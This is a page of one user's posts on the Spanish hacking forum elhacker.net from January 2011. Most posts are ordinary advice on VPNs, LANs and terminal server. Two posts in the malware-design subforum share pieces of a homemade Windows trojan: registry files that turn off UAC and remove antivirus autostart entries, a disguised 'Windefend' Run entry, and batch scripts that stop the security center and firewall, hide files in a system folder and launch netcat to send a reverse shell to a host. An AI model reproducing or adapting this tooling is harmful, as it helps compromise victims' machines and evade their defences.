elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Guía actualizada para evitar que un ransomware ataque tu empresa


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5
31  Seguridad Informática / Análisis y Diseño de Malware / Re: ¿Por que los troyanos no funcionan corectamente? [Windows Vista/7] en: 29 Enero 2011, 13:34 pm
compilé tu programa con borland 6 pero en xp sp3 no me funciono mu bien; es probable que sea por un parche de actualizac. de win.

ESTAS SON LAS MODIFICACIONES DE REGISTRO QUE HICE:

//ESTO ES UNA MODIFICACION PARA VISTA/W7 PARA QUE NO APAREZCA CENTRO
DE SEGURIDAD LO LLAMÉ W8.REG

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
"EnableLUA"=dword:00000000

//PROBÉ MI TROYANO CON ALGUNOS ANTIVIRUS Y AÑADÍ ESTA ENTRADA DE REGISTRO
PORQUE AVIRA O AVG DETECTABAN NETCAT COMO VIRUS LO LLAME RUN.REG

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"avgnt"=""
"GrooveMonitor"="\"C:\\Program Files\\Microsoft Office\\Office12\\GrooveMonitor.exe\""
"NeroFilterCheck"="C:\\Program Files\\Common Files\\Nero\\Lib\\NeroCheck.exe"
"NBKeyScan"="\"C:\\Program Files\\Nero\\Nero8\\Nero BackItUp\\NBKeyScan.exe\""
"AVG_TRAY"=""
"Windefend"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,49,00,6e,00,74,00,65,00,6c,00,5c,00,6d,00,73,00,30,00,37,\
  00,39,00,2e,00,65,00,78,00,65,00,00,00

ESTE ES EL PRIMER BATCH LO LLAME MS079.BAT

@echo off
REM DESACTIVA CC. Y FIREWALL, DESPUES EJECUTA PHOTOCS Y NETCAT
NET STOP "CENTRO DE SEGURIDAD"
net stop "sharedaccess"
rem TASKKILL /F /IM explorer.exe
explorer.exe
netsh firewall set opmode DISABLE
netsh firewall set opmode mode = DISABLE
cd %systemroot%\Intel
//REM RENOMBRO PARA TENER UN RESPALDO INDETECTABLE
rename resources.ps

SEGUNDO BATCH  

      REM COLOCA ARCHIVOS Y DEJA LISTO PARA EJECUCIÓN
@ECHO OFF
prompt
      rem hacer que se ejecute como administrador
md %systemroot%\Intel
cd %USERPROFILE%\desktop\proyecto
      rem acuerdate de cambiar el nombre
attrib -h *.*          
xcopy *.* %systemroot%\Intel /Y
regedit.exe /s %systemroot%\Intel\W8.reg
regedit.exe /s %systemroot%\Intel\run.reg
attrib +h *.*
ping 192.168.1.1
taskkill /F /IM explorer.exe /y
explorer.exe
exit

NECESITA UNOS ARREGLILLOS, NO ENCUENTRO AHORA EL QUE ESTÁ FINALIZADO;
USÉ EL BATTOEXE PARA HACERLO EJECUTABLE Y OCULTAR LA PANTALLITA NEGRA
Y WINDEFEND ES OTRO EJECUTABLE QUE ABRE NETCAT EN UN PUERTO A UN HOST
-- JOER, VOY A BUSCAR PARA ENCONTRAR TODO EL CODIGO DEL QUE ESTA FINALIZADO si quieres te envio el troyano y lo puedes destripar a tu gusto

32  Seguridad Informática / Análisis y Diseño de Malware / Re: ¿Por que los troyanos no funcionan corectamente? [Windows Vista/7] en: 29 Enero 2011, 12:35 pm
soy un poco novato en el tema, pero si observador; hace mucho que no toco C pero si puedo decirte algo realmente interesante que me pasó; conseguí con un programilla exo en batch que w7/vista/xp me envíe su shell a través de netcat; y como supongo que sabrás tuve que añadirle entradas al registro para que algunos antivirus no detectaran (vamos que no se iniciara el antivirus) nc, supongo que el fallo que cometes en C pueda estar resuelto en mi batch (ojo no pestañean en w7 ni vista al instalarse; ningun aviso)
33  Comunicaciones / Redes / Re: modem ubee u10c022 en: 27 Enero 2011, 12:32 pm
yo que tu los llamaba otra vez muy cabreado y diciendoles que vas a rescindir el contrato porque tu pagas por una línea y te restringen el tráfico por un puerto que necesitas;que no pagas solo por el puerto 80 y revisaría si en tu contrato has pagado tu router o solo lo alquilas, si lo has pagado es de tu uso no del de ellos; asi puedes apretarles un pco las tuercas.un saludo!
34  Comunicaciones / Redes / Re: acceder rapidamente a tus datos ftp o vpn? en: 27 Enero 2011, 12:10 pm
la aplicación esta instalada y funciona sin acceder a escritorio remoto; el problema es que va mas lento que un desfile de cojos y por eso los empleados prefieren entrar directamente por escritorio remoto que no esperar un minuto a que se carge cada cosa en su propio pc. un saludo; la conexión vpn que existe ahora es muy muy lenta incluso para abrir un documento de wordpad.

son 6 usuarios repartidos en dos oficinas, solo necesito un intercambio simple de archivos (hojas de calculo,documentos word etc) y que el ts-seguros vaya bien.

no es el mismo tema, ayer no podía acceder yo a escritorio remoto para hechar a los clientes inactivos, hoy quiero buscar una solucion para que no haga falta que los usuarios entren por escritorio remoto
35  Comunicaciones / Redes / Re: Ayuda a crear una red local... en: 27 Enero 2011, 11:58 am
a ver, creo que no se puede compartir esa conexion, corrijanme si me equivoco; se puede compartir entre dos interfaces de red como ethernet y wifi pero con el pirulo creo que no te o permite el asistente; yo intentaría configurar tu pc (servidor) como proxi; otra cuestión importante es la velocidad de navegacion no sea satisfactoria atraves del aparatillo que tienes para conectarte.
36  Comunicaciones / Redes / Re: acceder rapidamente a tus datos ftp o vpn? en: 27 Enero 2011, 11:43 am
te presento mejor el problema que tengo, normalmente trabajo con servidores a los que puedo acceder fisicamente pero en este caso el servidor se encuentra en otro país y solo tengo acceso de forma remota; hay importantes agujeros de seguridad porque para acceder al programa de gestión toda la empresa accede por escritorio remoto al server directamente, otro agujero de seguridad está en que individualmente todos los equipos están conectados por vpn al server en un intento de que funcionase teniendo acceso incluso al disco del sistema, y por no hablar de las copias de seguridad... vamos que el lumbreras que hizo todo esto no debería tener permiso ni para tocar una calculadora!

Ahora voy por partes, acabo de coger esta empresa hace un par de dias; hace aguas por todos lados con problemas y quiero centrarme en que el programa funcione de forma remota y evitar que los empleados accedan a un server.

No puedo cometer ni un solo error teniendo un servidor remoto, el servidor tiene 3mb de subida com de bajada; y las oficinas tienen un adsl normalilla de 2mb x 1mb
¿puedo sacarle verdadero partido con un router vpn en las oficinas?? mejor ftps???

muchas gracias por responder, un saludo.
37  Comunicaciones / Redes / Re: Problema red lan... en: 26 Enero 2011, 18:32 pm
no es que me gusten mucho los juegos, pero se puede investigar un poco; básicamente cuando jugamos en red el juego debe transmitir datos a través de un puerto o varios, me imagino que tienes un switch sencillo, doy por hecho que tienes ya sea firewall de windows como de los antivirus desactivados y por experiencia se que w7 es un sistema coñazo a veces para ciertas aplicaciones por lo que intentaría a través de otro amigo intentarlo de xp a xp para saber en qué equipo tienes el problema; y de los xp desatendidos si te digo la verdad no soy muy partidario de ellos, lo unico que te puedo aconsejar es un método de descarte. un saludo!
38  Comunicaciones / Redes / acceder rapidamente a tus datos ftp o vpn? en: 26 Enero 2011, 16:55 pm
tengo una vpn montada; según los test tengo 2mb de bajada 3mb de subida, varios clientes a traves de una conexión de 2mb de bajada y 1mb de subida; es muy lento acceder a la base de datos de un programa con este sistema; ya se lo que me direis sobre vpn y ftp con respecto a seguridad pero mi pregunta es si es mas rapido ftp o vpn, un gran saludo!
39  Comunicaciones / Redes / Re: conexion limitada o nula. raro... en: 26 Enero 2011, 14:37 pm
me ha pasado mucho; lo mas común es obiar que la contraseña está bien escrita,

motivo 1: no has puesto la contraseña en mayúsculas o minusculas respetando la clave; eso me ha pasado unas cuantas veces. doble click sobre la conexión y verás si hay paquetes enviados y recibidos; si no hay recibidos es una causa provable

motivo 2: dhcp no esta funcionando como han dicho otros compañeros; conectate por cable a ver si te da direccion ip, si te la da ese no es el problema

motivo 3: la tarjeta inalambrica interna de tu portatil sta hecha ***** o simplemente tu sistema operativo ta cascao

yo probaría las tres primeras, si no ve con tu portatil a la calle e intenta conectarte a redes sin proteger a ver si conecta; si no conecta piensa en lo unico que puedes resolver darle machete al xp,vista o w7 para estar seguros de que no es un gusano.

espero serte de ayuda, un saludo.
40  Comunicaciones / Redes / Re: problemas con terminal server ayuuuuda.... en: 26 Enero 2011, 13:58 pm
creo que ya tengo la solucion mstsc /admin /v:ipdelservidor /f -console al menos me funcionó; una pregunta, es normal que me encuentre conectada una cuenta llamada SUPPORT065561 (no son los numeros k me aparecian pero sirve deejemplo) en terminal server?, no me da buena espina pero como microsoft es tan raro...
Páginas: 1 2 3 [4] 5
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines